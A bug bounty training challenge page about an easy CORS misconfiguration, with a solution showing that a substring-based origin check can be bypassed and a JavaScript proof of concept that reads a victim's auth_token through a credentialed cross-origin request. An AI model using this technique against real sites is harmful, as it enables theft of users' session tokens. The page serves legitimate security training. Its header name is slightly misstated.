Checking if a whitelisted string is found is a bad approach

Important information

Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.

Failure to abide by the rules will put you at risk of being restricted from using our free challenges.

Checking if a whitelisted string is found is a bad approach

Begin challenge

Easy Cross Origin Resource Sharing

When you press Begin Challenge you'll be sent to https://www.bugbountytraining.com/challenges/challenge-16.php and will see {"auth_token":"anVzdF9hbl9leGFtcGxl"}.

An attacker may want to obtain this value from their victim, but how could they do this?

This is your objective. Find a way to obtain the information when your victim (you) visits your proof of concept.

Completed the challenge?

You can browse the intended solution to this challenge below.

Solution

Think about CORS!

Add the Origin: header with https://www.bugbountytraining.com and you'll see:

Access-Allow-Control-Origin: https://www.bugbountytraining.com

The code is only checking if this domain is found, meaning you can use Origin: https://www.bugbountytraining.yourdomain.com/ and it will successfully reflect:

Access-Allow-Control-Origin: https://www.bugbountytraining.com.zseano.com

Add this POC to a domain that includes www.bugbountytraining.com (edit your hosts file and point it to your local ip. For example 127.0.0.1 www.bugbountytraining.com.zseano.com) and you'll see it alerts the auth_token

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
     alert(xhttp.responseText);
    }
};
xhttp.open("GET", "https://www.bugbountytraining.com/challenges/challenge-16.php", true);
xhttp.withCredentials=true;
xhttp.send();

BugBountyHunter

Important information